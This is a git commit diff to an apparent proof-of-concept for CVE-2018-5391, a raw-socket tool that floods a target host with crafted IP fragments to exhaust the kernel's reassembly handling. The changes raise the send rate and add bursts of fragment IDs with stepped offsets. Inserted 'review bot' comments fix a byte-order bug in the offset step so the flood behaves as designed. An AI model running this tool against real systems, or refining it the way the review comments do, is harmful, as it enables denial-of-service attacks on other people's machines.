author | Toni Uhlig <matzeton@googlemail.com> | 2018-09-30 18:06:57 +0200 |
committer | Toni Uhlig <matzeton@googlemail.com> | 2018-09-30 18:06:57 +0200 |
commit | 42c2a6710f55686dd965d2e3ffe1761994fce752 (patch) | |
tree | d7195e0acb27f08e42842ef7c08332349a2268eb | |
parent | 293a5a32e5c040872e85a636942caed6258da32a (diff) |
*brrrr²*
Signed-off-by: Toni Uhlig <matzeton@googlemail.com>
-rw-r--r-- | cve-2018-5391.c | 41 |
1 files changed, 32 insertions, 9 deletions
diff --git a/cve-2018-5391.c b/cve-2018-5391.c
index 9f16d7e..0bfa2f4 100644
--- a/cve-2018-5391.c
+++ b/cve-2018-5391.c
@@ -58,7 +58,9 @@ int main(int argc, char **argv)
     int s = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
     int r, val = 1;
     size_t data_size = 896 - sizeof *ip;
-    useconds_t send_rate = 50 * 1000; /* 50ms */
+    useconds_t send_rate = 1 * 1000; /* 50ms */
+    size_t cur_frags, max_frags = 64;
+    uint16_t id, max_bucket = 32;
     die_on_error("socket", s < 0);
@@ -79,8 +81,8 @@ int main(int argc, char **argv)
     ip->tos = 0;
     ip->tot_len = data_size - sizeof(struct iphdr);
     assert(ip->tot_len <= PKG_BUF);
-    ip->id = htonl(0xDEAD);
-    ip->frag_off = htonl(0xBEEF);
+    ip->id = 0;
+    ip->frag_off = 0;
     ip->ttl = 255;
     ip->protocol = IPPROTO_IP;
     ip->check = 0;
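Review bot: The comment on the changed `send_rate` line in the first hunk is now stale: the value dropped from `50 * 1000` to `1 * 1000` microseconds while the trailing `/* 50ms */` still says 50ms. Either update it to `useconds_t send_rate = 1 * 1000; /* 1ms */` or, better, give the delay a named constant with the unit in its name so the comment cannot drift again. The enclosing main() begins before this hunk and continues past it.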
@@ -92,16 +94,37 @@ int main(int argc, char **argv)
     dest.sin_addr.s_addr = inet_addr(argv[2]);
     srandom(time(NULL));
+    cur_frags = 0;
     while (1) {
+        if (cur_frags % max_frags == 0) {
+            ip->frag_off &= 0xFF1F;
+            id = ip->id;
+            for (uint16_t i = 0; i < max_bucket; ++i) {
+                ip->id = htons(id + i);
+                r = sendto(s, pkg, ip->tot_len, 0, (struct sockaddr *) &dest, sizeof dest);
+                die_on_error("sendto", r != ip->tot_len);
+            }
+            ip->id = id;
+
+            ip->id = (uint16_t) random();
+            ip->frag_off = 0x0020;
+            printf("ip->id = %u\n", ip->id);
+        }
+
         //ip->saddr = (uint32_t) random();
-        ip->frag_off = (uint16_t) random();
-        ip->frag_off &= 0xFF1F; /* zero reserved,dont-frag,more-frag (little-endian) */
-        ip->frag_off |= 0x0020; /* force more-frag set (little-endian) */
-        ip->id = (uint16_t) random();
-        r = sendto(s, pkg, ip->tot_len, 0, (struct sockaddr *) &dest, sizeof dest);
-        die_on_error("sendto", r != ip->tot_len);
+        id = ip->id;
+        for (uint16_t i = 0; i < max_bucket; ++i) {
+            ip->id = htons(id + i);
+            r = sendto(s, pkg, ip->tot_len, 0, (struct sockaddr *) &dest, sizeof dest);
+            die_on_error("sendto", r != ip->tot_len);
+        }
+        ip->id = id;
         usleep(send_rate);
+        printf("%zu: ipd->id = %04X , ip->frag_off = %04X\n", cur_frags,
+               ip->id, ntohs(ip->frag_off));
+        ip->frag_off += htons(8);
+        cur_frags++;
     }
     return 0; |
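Review bot: The offset step at the end of the loop body, `ip->frag_off += htons(8);`, performs the addition in host byte order on a network-order 16-bit field, so on a little-endian host the carry out of the low wire byte is lost: starting from `0x0020` (MF set, offset 0 on the wire), the 32nd increment overflows the field and the fragment offset silently wraps back to 0 instead of reaching 256, even though the reset block only runs every `max_frags` (64) iterations. Converting before the add fixes it: `ip->frag_off = htons(ntohs(ip->frag_off) + 8);`, which also keeps the MF flag intact since 63 steps of 8 stay well inside the 13-bit offset field. The removed comment that explained `0xFF1F` / `0x0020` as the little-endian view of the reserved/DF/MF bits should be carried over to the new `if (cur_frags % max_frags == 0)` block, e.g. `/* 0x0020: MF set, offset 0 (little-endian view of the network-order field) */`, since those magic numbers now appear without any explanation. The `printf` after `usleep()` also emits `ipd->id`, presumably a typo for `ip->id`. The enclosing main() begins before this hunk and its closing brace lies outside it.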